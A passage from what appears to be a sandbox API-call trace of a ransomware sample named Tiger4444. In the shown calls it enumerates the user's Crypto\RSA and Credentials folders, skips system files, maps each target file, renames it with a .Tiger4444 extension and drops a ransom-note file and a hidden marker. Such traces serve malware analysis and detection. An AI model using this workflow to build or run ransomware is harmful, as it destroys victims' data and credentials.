out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x85dac67d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0055.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.105] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.105] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.105] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x85dac67d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.105] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.105] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.105] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.105] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.105] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85dac67d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85dac67d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85dd2927, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.105] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.105] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.105] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x7223c64d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x7223c64d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x7223c64d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="83AA4C~1")) returned 1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Tiger4444.exe") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".") returned 1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="..") returned 1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="windows") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="bootmgr") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="pagefile.sys") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="boot") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="ids.txt") returned -1 [0055.105] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="NTUSER.DAT") returned -1 [0055.105] lstrcpyW (in: lpString1=0x30aeb6e, lpString2="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" | out: lpString1="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71") returned="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" [0055.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x20) returned 1 [0055.108] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x4) returned 1 [0055.109] lstrlenW (lpString="83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71") returned 69 [0055.109] lstrlenW (lpString="Tiger4444") returned 9 [0055.109] lstrcmpiW (lpString1="cdac43a71", lpString2="Tiger4444") returned -1 [0055.109] lstrlenW (lpString=".dll") returned 4 [0055.109] lstrcmpiW (lpString1="3a71", lpString2=".dll") returned 1 [0055.109] lstrlenW (lpString=".lnk") returned 4 [0055.109] lstrcmpiW (lpString1="3a71", lpString2=".lnk") returned 1 [0055.109] lstrlenW (lpString=".ini") returned 4 [0055.109] lstrcmpiW (lpString1="3a71", lpString2=".ini") returned 1 [0055.109] lstrlenW (lpString=".sys") returned 4 [0055.109] lstrcmpiW (lpString1="3a71", lpString2=".sys") returned 1 [0055.109] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.109] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.109] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14656226163) returned 1 [0055.109] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=45) returned 1 [0055.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0055.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0055.109] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x2cc [0055.112] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0xbe0000 [0055.118] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.118] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0055.118] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.119] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0055.119] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0055.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0055.119] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14657202287) returned 1 [0055.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0055.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0055.119] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.119] CloseHandle (hObject=0x2cc) returned 1 [0055.119] CloseHandle (hObject=0x2b8) returned 1 [0055.119] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.Tiger4444") returned 178 [0055.119] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.tiger4444"), dwFlags=0x1) returned 1 [0055.120] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x78b163bf, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78b163bf, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78b163bf, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="EC679D~1")) returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Tiger4444.exe") returned -1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2=".") returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="..") returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="windows") returned -1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="bootmgr") returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="pagefile.sys") returned -1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="boot") returned 1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="ids.txt") returned -1 [0055.120] lstrcmpiW (lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="NTUSER.DAT") returned -1 [0055.120] lstrcpyW (in: lpString1=0x30aeb6e, lpString2="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" | out: lpString1="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71") returned="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" [0055.120] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x20) returned 1 [0055.123] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", dwFileAttributes=0x4) returned 1 [0055.123] lstrlenW (lpString="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71") returned 69 [0055.123] lstrlenW (lpString="Tiger4444") returned 9 [0055.123] lstrcmpiW (lpString1="cdac43a71", lpString2="Tiger4444") returned -1 [0055.123] lstrlenW (lpString=".dll") returned 4 [0055.123] lstrcmpiW (lpString1="3a71", lpString2=".dll") returned 1 [0055.123] lstrlenW (lpString=".lnk") returned 4 [0055.123] lstrcmpiW (lpString1="3a71", lpString2=".lnk") returned 1 [0055.123] lstrlenW (lpString=".ini") returned 4 [0055.123] lstrcmpiW (lpString1="3a71", lpString2=".ini") returned 1 [0055.123] lstrlenW (lpString=".sys") returned 4 [0055.123] lstrcmpiW (lpString1="3a71", lpString2=".sys") returned 1 [0055.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.124] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.124] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14657672400) returned 1 [0055.124] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=47) returned 1 [0055.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0055.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0055.124] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x2cc [0055.132] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0xbe0000 [0055.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0055.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0055.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0055.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0055.134] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14658700177) returned 1 [0055.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0055.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0055.134] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.134] CloseHandle (hObject=0x2cc) returned 1 [0055.134] CloseHandle (hObject=0x2b8) returned 1 [0055.134] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.Tiger4444") returned 178 [0055.134] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71.tiger4444"), dwFlags=0x1) returned 1 [0055.135] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x78b163bf, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78b163bf, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78b163bf, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="EC679D~1")) returned 0 [0055.135] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0055.135] lstrcpyW (in: lpString1=0x30aeb6e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.151] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.151] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.152] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.152] CloseHandle (hObject=0x2b8) returned 1 [0055.152] CloseHandle (hObject=0x2c4) returned 1 [0055.152] GetCurrentThreadId () returned 0xfa8 [0055.152] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666c8 [0055.152] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" [0055.152] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0055.152] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0055.152] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials" [0055.152] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\" [0055.152] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3" [0055.152] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\credentials\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.153] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.155] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.157] CloseHandle (hObject=0x2c4) returned 1 [0055.157] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials") returned 53 [0055.158] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.158] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x85e450f5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0055.158] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.158] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.158] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.158] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x85e450f5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.158] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.158] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.158] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.158] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85e450f5, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85e450f5, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85e450f5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.158] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.158] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.158] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85e450f5, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85e450f5, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85e450f5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, 